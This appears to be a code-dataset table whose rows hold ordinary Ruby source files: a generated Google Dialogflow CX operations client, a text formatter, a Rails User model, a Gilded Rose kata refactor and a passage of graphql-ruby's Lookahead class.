hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
61d2ba03b2b3d13fbbc210da97c24b0913afac89 | 40,510 | # frozen_string_literal: true
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
require "gapic/operation"
require "google/longrunning/operations_pb"
module Google
module Cloud
module Dialogflow
module CX
module V3
module TestCases
# Service that implements Longrunning Operations API.
class Operations
# @private
attr_reader :operations_stub
##
# Configuration for the TestCases Operations API.
#
# @yield [config] Configure the Operations client.
# @yieldparam config [Operations::Configuration]
#
# @return [Operations::Configuration]
#
def self.configure
@configure ||= Operations::Configuration.new
yield @configure if block_given?
@configure
end
##
# Configure the TestCases Operations instance.
#
# The configuration is set to the derived mode, meaning that values can be changed,
# but structural changes (adding new fields, etc.) are not allowed. Structural changes
# should be made on {Operations.configure}.
#
# @yield [config] Configure the Operations client.
# @yieldparam config [Operations::Configuration]
#
# @return [Operations::Configuration]
#
def configure
yield @config if block_given?
@config
end
##
# Create a new Operations client object.
#
# @yield [config] Configure the Client client.
# @yieldparam config [Operations::Configuration]
#
def initialize
# These require statements are intentionally placed here to initialize
# the gRPC module only when it's required.
# See https://github.com/googleapis/toolkit/issues/446
require "gapic/grpc"
require "google/longrunning/operations_services_pb"
# Create the configuration object
@config = Configuration.new Operations.configure
# Yield the configuration if needed
yield @config if block_given?
# Create credentials
credentials = @config.credentials
credentials ||= Credentials.default scope: @config.scope
if credentials.is_a?(::String) || credentials.is_a?(::Hash)
credentials = Credentials.new credentials, scope: @config.scope
end
@quota_project_id = @config.quota_project
@quota_project_id ||= credentials.quota_project_id if credentials.respond_to? :quota_project_id
@operations_stub = ::Gapic::ServiceStub.new(
::Google::Longrunning::Operations::Stub,
credentials: credentials,
endpoint: @config.endpoint,
channel_args: @config.channel_args,
interceptors: @config.interceptors
)
end
# Service calls
##
# Lists operations that match the specified filter in the request. If the
# server doesn't support this method, it returns `UNIMPLEMENTED`.
#
# NOTE: the `name` binding allows API services to override the binding
# to use different resource name schemes, such as `users/*/operations`. To
# override the binding, API services can add a binding such as
# `"/v1/{name=users/*}/operations"` to their service configuration.
# For backwards compatibility, the default name includes the operations
# collection id, however overriding users must ensure the name binding
# is the parent resource, without the operations collection id.
#
# @overload list_operations(request, options = nil)
# Pass arguments to `list_operations` via a request object, either of type
# {::Google::Longrunning::ListOperationsRequest} or an equivalent Hash.
#
# @param request [::Google::Longrunning::ListOperationsRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload list_operations(name: nil, filter: nil, page_size: nil, page_token: nil)
# Pass arguments to `list_operations` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param name [::String]
# The name of the operation's parent resource.
# @param filter [::String]
# The standard list filter.
# @param page_size [::Integer]
# The standard list page size.
# @param page_token [::String]
# The standard list page token.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Gapic::PagedEnumerable<::Gapic::Operation>]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Gapic::PagedEnumerable<::Gapic::Operation>]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
# @example Basic example
# require "google/longrunning"
#
# # Create a client object. The client can be reused for multiple calls.
# client = Google::Longrunning::Operations::Client.new
#
# # Create a request. To set request fields, pass in keyword arguments.
# request = Google::Longrunning::ListOperationsRequest.new
#
# # Call the list_operations method.
# result = client.list_operations request
#
# # The returned object is of type Gapic::PagedEnumerable. You can
# # iterate over all elements by calling #each, and the enumerable
# # will lazily make API calls to fetch subsequent pages. Other
# # methods are also available for managing paging directly.
# result.each do |response|
# # Each element is of type ::Google::Longrunning::Operation.
# p response
# end
#
def list_operations request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Longrunning::ListOperationsRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.list_operations.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Dialogflow::CX::V3::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
header_params = {}
if request.name
header_params["name"] = request.name
end
request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&")
metadata[:"x-goog-request-params"] ||= request_params_header
options.apply_defaults timeout: @config.rpcs.list_operations.timeout,
metadata: metadata,
retry_policy: @config.rpcs.list_operations.retry_policy
options.apply_defaults timeout: @config.timeout,
metadata: @config.metadata,
retry_policy: @config.retry_policy
@operations_stub.call_rpc :list_operations, request, options: options do |response, operation|
wrap_lro_operation = ->(op_response) { ::Gapic::Operation.new op_response, @operations_client }
response = ::Gapic::PagedEnumerable.new @operations_stub, :list_operations, request, response, operation, options, format_resource: wrap_lro_operation
yield response, operation if block_given?
return response
end
rescue ::GRPC::BadStatus => e
raise ::Google::Cloud::Error.from_error(e)
end
##
# Gets the latest state of a long-running operation. Clients can use this
# method to poll the operation result at intervals as recommended by the API
# service.
#
# @overload get_operation(request, options = nil)
# Pass arguments to `get_operation` via a request object, either of type
# {::Google::Longrunning::GetOperationRequest} or an equivalent Hash.
#
# @param request [::Google::Longrunning::GetOperationRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload get_operation(name: nil)
# Pass arguments to `get_operation` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param name [::String]
# The name of the operation resource.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Gapic::Operation]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Gapic::Operation]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
# @example Basic example
# require "google/longrunning"
#
# # Create a client object. The client can be reused for multiple calls.
# client = Google::Longrunning::Operations::Client.new
#
# # Create a request. To set request fields, pass in keyword arguments.
# request = Google::Longrunning::GetOperationRequest.new
#
# # Call the get_operation method.
# result = client.get_operation request
#
# # The returned object is of type Gapic::Operation. You can use this
# # object to check the status of an operation, cancel it, or wait
# # for results. Here is how to block until completion:
# result.wait_until_done! timeout: 60
# if result.response?
# p result.response
# else
# puts "Error!"
# end
#
def get_operation request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Longrunning::GetOperationRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.get_operation.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Dialogflow::CX::V3::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
header_params = {}
if request.name
header_params["name"] = request.name
end
request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&")
metadata[:"x-goog-request-params"] ||= request_params_header
options.apply_defaults timeout: @config.rpcs.get_operation.timeout,
metadata: metadata,
retry_policy: @config.rpcs.get_operation.retry_policy
options.apply_defaults timeout: @config.timeout,
metadata: @config.metadata,
retry_policy: @config.retry_policy
@operations_stub.call_rpc :get_operation, request, options: options do |response, operation|
response = ::Gapic::Operation.new response, @operations_client, options: options
yield response, operation if block_given?
return response
end
rescue ::GRPC::BadStatus => e
raise ::Google::Cloud::Error.from_error(e)
end
##
# Deletes a long-running operation. This method indicates that the client is
# no longer interested in the operation result. It does not cancel the
# operation. If the server doesn't support this method, it returns
# `google.rpc.Code.UNIMPLEMENTED`.
#
# @overload delete_operation(request, options = nil)
# Pass arguments to `delete_operation` via a request object, either of type
# {::Google::Longrunning::DeleteOperationRequest} or an equivalent Hash.
#
# @param request [::Google::Longrunning::DeleteOperationRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload delete_operation(name: nil)
# Pass arguments to `delete_operation` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param name [::String]
# The name of the operation resource to be deleted.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Google::Protobuf::Empty]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Google::Protobuf::Empty]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
# @example Basic example
# require "google/longrunning"
#
# # Create a client object. The client can be reused for multiple calls.
# client = Google::Longrunning::Operations::Client.new
#
# # Create a request. To set request fields, pass in keyword arguments.
# request = Google::Longrunning::DeleteOperationRequest.new
#
# # Call the delete_operation method.
# result = client.delete_operation request
#
# # The returned object is of type Google::Protobuf::Empty.
# p result
#
def delete_operation request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Longrunning::DeleteOperationRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.delete_operation.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Dialogflow::CX::V3::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
header_params = {}
if request.name
header_params["name"] = request.name
end
request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&")
metadata[:"x-goog-request-params"] ||= request_params_header
options.apply_defaults timeout: @config.rpcs.delete_operation.timeout,
metadata: metadata,
retry_policy: @config.rpcs.delete_operation.retry_policy
options.apply_defaults timeout: @config.timeout,
metadata: @config.metadata,
retry_policy: @config.retry_policy
@operations_stub.call_rpc :delete_operation, request, options: options do |response, operation|
yield response, operation if block_given?
return response
end
rescue ::GRPC::BadStatus => e
raise ::Google::Cloud::Error.from_error(e)
end
##
# Starts asynchronous cancellation on a long-running operation. The server
# makes a best effort to cancel the operation, but success is not
# guaranteed. If the server doesn't support this method, it returns
# `google.rpc.Code.UNIMPLEMENTED`. Clients can use
# Operations.GetOperation or
# other methods to check whether the cancellation succeeded or whether the
# operation completed despite cancellation. On successful cancellation,
# the operation is not deleted; instead, it becomes an operation with
# an {::Google::Longrunning::Operation#error Operation.error} value with a {::Google::Rpc::Status#code google.rpc.Status.code} of 1,
# corresponding to `Code.CANCELLED`.
#
# @overload cancel_operation(request, options = nil)
# Pass arguments to `cancel_operation` via a request object, either of type
# {::Google::Longrunning::CancelOperationRequest} or an equivalent Hash.
#
# @param request [::Google::Longrunning::CancelOperationRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload cancel_operation(name: nil)
# Pass arguments to `cancel_operation` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param name [::String]
# The name of the operation resource to be cancelled.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Google::Protobuf::Empty]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Google::Protobuf::Empty]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
# @example Basic example
# require "google/longrunning"
#
# # Create a client object. The client can be reused for multiple calls.
# client = Google::Longrunning::Operations::Client.new
#
# # Create a request. To set request fields, pass in keyword arguments.
# request = Google::Longrunning::CancelOperationRequest.new
#
# # Call the cancel_operation method.
# result = client.cancel_operation request
#
# # The returned object is of type Google::Protobuf::Empty.
# p result
#
def cancel_operation request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Longrunning::CancelOperationRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.cancel_operation.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Dialogflow::CX::V3::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
header_params = {}
if request.name
header_params["name"] = request.name
end
request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&")
metadata[:"x-goog-request-params"] ||= request_params_header
options.apply_defaults timeout: @config.rpcs.cancel_operation.timeout,
metadata: metadata,
retry_policy: @config.rpcs.cancel_operation.retry_policy
options.apply_defaults timeout: @config.timeout,
metadata: @config.metadata,
retry_policy: @config.retry_policy
@operations_stub.call_rpc :cancel_operation, request, options: options do |response, operation|
yield response, operation if block_given?
return response
end
rescue ::GRPC::BadStatus => e
raise ::Google::Cloud::Error.from_error(e)
end
##
# Waits until the specified long-running operation is done or reaches at most
# a specified timeout, returning the latest state. If the operation is
# already done, the latest state is immediately returned. If the timeout
# specified is greater than the default HTTP/RPC timeout, the HTTP/RPC
# timeout is used. If the server does not support this method, it returns
# `google.rpc.Code.UNIMPLEMENTED`.
# Note that this method is on a best-effort basis. It may return the latest
# state before the specified timeout (including immediately), meaning even an
# immediate response is no guarantee that the operation is done.
#
# @overload wait_operation(request, options = nil)
# Pass arguments to `wait_operation` via a request object, either of type
# {::Google::Longrunning::WaitOperationRequest} or an equivalent Hash.
#
# @param request [::Google::Longrunning::WaitOperationRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload wait_operation(name: nil, timeout: nil)
# Pass arguments to `wait_operation` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param name [::String]
# The name of the operation resource to wait on.
# @param timeout [::Google::Protobuf::Duration, ::Hash]
# The maximum duration to wait before timing out. If left blank, the wait
# will be at most the time permitted by the underlying HTTP/RPC protocol.
# If RPC context deadline is also specified, the shorter one will be used.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Gapic::Operation]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Gapic::Operation]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
# @example Basic example
# require "google/longrunning"
#
# # Create a client object. The client can be reused for multiple calls.
# client = Google::Longrunning::Operations::Client.new
#
# # Create a request. To set request fields, pass in keyword arguments.
# request = Google::Longrunning::WaitOperationRequest.new
#
# # Call the wait_operation method.
# result = client.wait_operation request
#
# # The returned object is of type Gapic::Operation. You can use this
# # object to check the status of an operation, cancel it, or wait
# # for results. Here is how to block until completion:
# result.wait_until_done! timeout: 60
# if result.response?
# p result.response
# else
# puts "Error!"
# end
#
def wait_operation request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Longrunning::WaitOperationRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.wait_operation.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Dialogflow::CX::V3::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
options.apply_defaults timeout: @config.rpcs.wait_operation.timeout,
metadata: metadata,
retry_policy: @config.rpcs.wait_operation.retry_policy
options.apply_defaults timeout: @config.timeout,
metadata: @config.metadata,
retry_policy: @config.retry_policy
@operations_stub.call_rpc :wait_operation, request, options: options do |response, operation|
response = ::Gapic::Operation.new response, @operations_client, options: options
yield response, operation if block_given?
return response
end
rescue ::GRPC::BadStatus => e
raise ::Google::Cloud::Error.from_error(e)
end
##
# Configuration class for the Operations API.
#
# This class represents the configuration for Operations,
# providing control over timeouts, retry behavior, logging, transport
# parameters, and other low-level controls. Certain parameters can also be
# applied individually to specific RPCs. See
# {::Google::Longrunning::Operations::Client::Configuration::Rpcs}
# for a list of RPCs that can be configured independently.
#
# Configuration can be applied globally to all clients, or to a single client
# on construction.
#
# @example
#
# # Modify the global config, setting the timeout for
# # list_operations to 20 seconds,
# # and all remaining timeouts to 10 seconds.
# ::Google::Longrunning::Operations::Client.configure do |config|
# config.timeout = 10.0
# config.rpcs.list_operations.timeout = 20.0
# end
#
# # Apply the above configuration only to a new client.
# client = ::Google::Longrunning::Operations::Client.new do |config|
# config.timeout = 10.0
# config.rpcs.list_operations.timeout = 20.0
# end
#
# @!attribute [rw] endpoint
# The hostname or hostname:port of the service endpoint.
# Defaults to `"dialogflow.googleapis.com"`.
# @return [::String]
# @!attribute [rw] credentials
# Credentials to send with calls. You may provide any of the following types:
# * (`String`) The path to a service account key file in JSON format
# * (`Hash`) A service account key as a Hash
# * (`Google::Auth::Credentials`) A googleauth credentials object
# (see the [googleauth docs](https://googleapis.dev/ruby/googleauth/latest/index.html))
# * (`Signet::OAuth2::Client`) A signet oauth2 client object
# (see the [signet docs](https://googleapis.dev/ruby/signet/latest/Signet/OAuth2/Client.html))
# * (`GRPC::Core::Channel`) a gRPC channel with included credentials
# * (`GRPC::Core::ChannelCredentials`) a gRPC credentails object
# * (`nil`) indicating no credentials
# @return [::Object]
# @!attribute [rw] scope
# The OAuth scopes
# @return [::Array<::String>]
# @!attribute [rw] lib_name
# The library name as recorded in instrumentation and logging
# @return [::String]
# @!attribute [rw] lib_version
# The library version as recorded in instrumentation and logging
# @return [::String]
# @!attribute [rw] channel_args
# Extra parameters passed to the gRPC channel. Note: this is ignored if a
# `GRPC::Core::Channel` object is provided as the credential.
# @return [::Hash]
# @!attribute [rw] interceptors
# An array of interceptors that are run before calls are executed.
# @return [::Array<::GRPC::ClientInterceptor>]
# @!attribute [rw] timeout
# The call timeout in seconds.
# @return [::Numeric]
# @!attribute [rw] metadata
# Additional gRPC headers to be sent with the call.
# @return [::Hash{::Symbol=>::String}]
# @!attribute [rw] retry_policy
# The retry policy. The value is a hash with the following keys:
# * `:initial_delay` (*type:* `Numeric`) - The initial delay in seconds.
# * `:max_delay` (*type:* `Numeric`) - The max delay in seconds.
# * `:multiplier` (*type:* `Numeric`) - The incremental backoff multiplier.
# * `:retry_codes` (*type:* `Array<String>`) - The error codes that should
# trigger a retry.
# @return [::Hash]
# @!attribute [rw] quota_project
# A separate project against which to charge quota.
# @return [::String]
#
class Configuration
extend ::Gapic::Config
config_attr :endpoint, "dialogflow.googleapis.com", ::String
config_attr :credentials, nil do |value|
allowed = [::String, ::Hash, ::Proc, ::Symbol, ::Google::Auth::Credentials, ::Signet::OAuth2::Client, nil]
allowed += [::GRPC::Core::Channel, ::GRPC::Core::ChannelCredentials] if defined? ::GRPC
allowed.any? { |klass| klass === value }
end
config_attr :scope, nil, ::String, ::Array, nil
config_attr :lib_name, nil, ::String, nil
config_attr :lib_version, nil, ::String, nil
config_attr(:channel_args, { "grpc.service_config_disable_resolution" => 1 }, ::Hash, nil)
config_attr :interceptors, nil, ::Array, nil
config_attr :timeout, nil, ::Numeric, nil
config_attr :metadata, nil, ::Hash, nil
config_attr :retry_policy, nil, ::Hash, ::Proc, nil
config_attr :quota_project, nil, ::String, nil
# @private
def initialize parent_config = nil
@parent_config = parent_config unless parent_config.nil?
yield self if block_given?
end
##
# Configurations for individual RPCs
# @return [Rpcs]
#
def rpcs
@rpcs ||= begin
parent_rpcs = nil
parent_rpcs = @parent_config.rpcs if defined?(@parent_config) && @parent_config.respond_to?(:rpcs)
Rpcs.new parent_rpcs
end
end
##
# Configuration RPC class for the Operations API.
#
# Includes fields providing the configuration for each RPC in this service.
# Each configuration object is of type `Gapic::Config::Method` and includes
# the following configuration fields:
#
# * `timeout` (*type:* `Numeric`) - The call timeout in seconds
# * `metadata` (*type:* `Hash{Symbol=>String}`) - Additional gRPC headers
# * `retry_policy (*type:* `Hash`) - The retry policy. The policy fields
# include the following keys:
# * `:initial_delay` (*type:* `Numeric`) - The initial delay in seconds.
# * `:max_delay` (*type:* `Numeric`) - The max delay in seconds.
# * `:multiplier` (*type:* `Numeric`) - The incremental backoff multiplier.
# * `:retry_codes` (*type:* `Array<String>`) - The error codes that should
# trigger a retry.
#
class Rpcs
##
# RPC-specific configuration for `list_operations`
# @return [::Gapic::Config::Method]
#
attr_reader :list_operations
##
# RPC-specific configuration for `get_operation`
# @return [::Gapic::Config::Method]
#
attr_reader :get_operation
##
# RPC-specific configuration for `delete_operation`
# @return [::Gapic::Config::Method]
#
attr_reader :delete_operation
##
# RPC-specific configuration for `cancel_operation`
# @return [::Gapic::Config::Method]
#
attr_reader :cancel_operation
##
# RPC-specific configuration for `wait_operation`
# @return [::Gapic::Config::Method]
#
attr_reader :wait_operation
# @private
def initialize parent_rpcs = nil
list_operations_config = parent_rpcs.list_operations if parent_rpcs.respond_to? :list_operations
@list_operations = ::Gapic::Config::Method.new list_operations_config
get_operation_config = parent_rpcs.get_operation if parent_rpcs.respond_to? :get_operation
@get_operation = ::Gapic::Config::Method.new get_operation_config
delete_operation_config = parent_rpcs.delete_operation if parent_rpcs.respond_to? :delete_operation
@delete_operation = ::Gapic::Config::Method.new delete_operation_config
cancel_operation_config = parent_rpcs.cancel_operation if parent_rpcs.respond_to? :cancel_operation
@cancel_operation = ::Gapic::Config::Method.new cancel_operation_config
wait_operation_config = parent_rpcs.wait_operation if parent_rpcs.respond_to? :wait_operation
@wait_operation = ::Gapic::Config::Method.new wait_operation_config
yield self if block_given?
end
end
end
end
end
end
end
end
end
end
| 52.61039 | 168 | 0.547741 |
1ad8aff0cd231d842de20572af7227ea52a85961 | 446 | module Lumos
module Formatters
class Bottom < Lumos::Formatters::Base
def initialize(options = {})
super
@padding = options.fetch(:padding, 0).to_i.abs
end
def result
"#{iterate_chopped_lines{ |line| "#{content_paragraph(line)}\n" }}"\
"#{horizontal_padding}"\
"#{horizontal_line}"
end
private
def content_paragraph(line)
line
end
end
end
end
| 19.391304 | 76 | 0.578475 |
26e92ccaa65433a6795b4f7e045593b41173fd1f | 253 | class User < ApplicationRecord
enum role: { user: 0, admin: 1 }
has_many :quizzes, dependent: :destroy
has_many :user_answers
has_secure_password
validates :firstname, presence: true
validates :email, presence: true, uniqueness: true
end
| 21.083333 | 52 | 0.743083 |
abb43d8abafc0f5464dd83a272c886edfbdd3500 | 2,017 | # frozen_string_literal: true
class GildedRose
def initialize(items)
@items = items
end
def update_quality
@items.each do |item|
if different_from_brie_and_backstage?(item.name)
item.quality = first_validation(item)
elsif quality_less_than_fifty?(item.quality)
second_validation(item)
elsif different_from_sulfuras?(item.name)
item.sell_in = subtract(item.sell_in)
elsif item.sell_in.negative?
third_validation(item)
end
end
end
def different_from_sulfuras?(name)
name != 'Sulfuras, Hand of Ragnaros'
end
def diffent_from_brie?(name)
name != 'Aged Brie'
end
def different_from_brie_and_backstage?(name)
diffent_from_brie?(name) &&
name != 'Backstage passes to a TAFKAL80ETC concert'
end
def equal_to_brie_and_backstage(name)
name == 'Backstage passes to a TAFKAL80ETC concert'
end
def subtract(item)
item - 1
end
def sum(quality)
quality + 1
end
def quality_less_than_fifty?(quality)
quality < 50
end
def first_validation(item)
return unless item.quality.positive? && different_from_sulfuras?(item.name)
subtract(item.quality)
end
def second_validation(item)
item.quality = sum(item.quality)
item.quality = if equal_to_brie_and_backstage(item.name) && item.sell_in < 11
sum(item.quality)
elsif item.sell_in < 6
sum(item.quality)
end
end
def third_validation(item)
if different_from_brie_and_backstage?(item.name)
first_validation(item)
elsif diffent_from_brie?(item.name)
item.quality = item.quality - item.quality
elsif quality_less_than_fifty?(item.quality)
sum(item.quality)
end
end
end
class Item
attr_accessor :name, :sell_in, :quality
def initialize(name, sell_in, quality)
@name = name
@sell_in = sell_in
@quality = quality
end
def to_s
"#{@name}, #{@sell_in}, #{@quality}"
end
end
| 22.411111 | 81 | 0.667824 |
39a36753f534510c77399c2fe8e9f8bc4a523c9d | 15,901 | # frozen_string_literal: true
module GraphQL
module Execution
# Lookahead creates a uniform interface to inspect the forthcoming selections.
#
# It assumes that the AST it's working with is valid. (So, it's safe to use
# during execution, but if you're using it directly, be sure to validate first.)
#
# A field may get access to its lookahead by adding `extras: [:lookahead]`
# to its configuration.
#
# @example looking ahead in a field
# field :articles, [Types::Article], null: false,
# extras: [:lookahead]
#
# # For example, imagine a faster database call
# # may be issued when only some fields are requested.
# #
# # Imagine that _full_ fetch must be made to satisfy `fullContent`,
# # we can look ahead to see if we need that field. If we do,
# # we make the expensive database call instead of the cheap one.
# def articles(lookahead:)
# if lookahead.selects?(:full_content)
# fetch_full_articles(object)
# else
# fetch_preview_articles(object)
# end
# end
class Lookahead
# @param query [GraphQL::Query]
# @param ast_nodes [Array<GraphQL::Language::Nodes::Field>, Array<GraphQL::Language::Nodes::OperationDefinition>]
# @param field [GraphQL::Schema::Field] if `ast_nodes` are fields, this is the field definition matching those nodes
# @param root_type [Class] if `ast_nodes` are operation definition, this is the root type for that operation
def initialize(query:, ast_nodes:, field: nil, root_type: nil, owner_type: nil)
@ast_nodes = ast_nodes.freeze
@field = field
@root_type = root_type
@query = query
@selected_type = @field ? @field.type.unwrap : root_type
@owner_type = owner_type
end
# @return [Array<GraphQL::Language::Nodes::Field>]
attr_reader :ast_nodes
# @return [GraphQL::Schema::Field]
attr_reader :field
# @return [GraphQL::Schema::Object, GraphQL::Schema::Union, GraphQL::Schema::Interface]
attr_reader :owner_type
# @return [Hash<Symbol, Object>]
def arguments
@arguments ||= @field && ArgumentHelpers.arguments(@query, @field, ast_nodes.first)
end
# True if this node has a selection on `field_name`.
# If `field_name` is a String, it is treated as a GraphQL-style (camelized)
# field name and used verbatim. If `field_name` is a Symbol, it is
# treated as a Ruby-style (underscored) name and camelized before comparing.
#
# If `arguments:` is provided, each provided key/value will be matched
# against the arguments in the next selection. This method will return false
# if any of the given `arguments:` are not present and matching in the next selection.
# (But, the next selection may contain _more_ than the given arguments.)
# @param field_name [String, Symbol]
# @param arguments [Hash] Arguments which must match in the selection
# @return [Boolean]
def selects?(field_name, arguments: nil)
selection(field_name, arguments: arguments).selected?
end
# @return [Boolean] True if this lookahead represents a field that was requested
def selected?
true
end
# Like {#selects?}, but can be used for chaining.
# It returns a null object (check with {#selected?})
# @return [GraphQL::Execution::Lookahead]
def selection(field_name, selected_type: @selected_type, arguments: nil)
next_field_name = normalize_name(field_name)
next_field_defn = FieldHelpers.get_field(@query.schema, selected_type, next_field_name)
if next_field_defn
next_nodes = []
@ast_nodes.each do |ast_node|
ast_node.selections.each do |selection|
find_selected_nodes(selection, next_field_name, next_field_defn, arguments: arguments, matches: next_nodes)
end
end
if next_nodes.any?
Lookahead.new(query: @query, ast_nodes: next_nodes, field: next_field_defn, owner_type: selected_type)
else
NULL_LOOKAHEAD
end
else
NULL_LOOKAHEAD
end
end
# Like {#selection}, but for all nodes.
# It returns a list of Lookaheads for all Selections
#
# If `arguments:` is provided, each provided key/value will be matched
# against the arguments in each selection. This method will filter the selections
# if any of the given `arguments:` do not match the given selection.
#
# @example getting the name of a selection
# def articles(lookahead:)
# next_lookaheads = lookahead.selections # => [#<GraphQL::Execution::Lookahead ...>, ...]
# next_lookaheads.map(&:name) #=> [:full_content, :title]
# end
#
# @param arguments [Hash] Arguments which must match in the selection
# @return [Array<GraphQL::Execution::Lookahead>]
def selections(arguments: nil)
subselections_by_type = {}
subselections_on_type = subselections_by_type[@selected_type] = {}
@ast_nodes.each do |node|
find_selections(subselections_by_type, subselections_on_type, @selected_type, node.selections, arguments)
end
subselections = []
subselections_by_type.each do |type, ast_nodes_by_response_key|
ast_nodes_by_response_key.each do |response_key, ast_nodes|
field_defn = FieldHelpers.get_field(@query.schema, type, ast_nodes.first.name)
lookahead = Lookahead.new(query: @query, ast_nodes: ast_nodes, field: field_defn, owner_type: type)
subselections.push(lookahead)
end
end
subselections
end
# The method name of the field.
# It returns the method_sym of the Lookahead's field.
#
# @example getting the name of a selection
# def articles(lookahead:)
# article.selection(:full_content).name # => :full_content
# # ...
# end
#
# @return [Symbol]
def name
@field && @field.original_name
end
def inspect
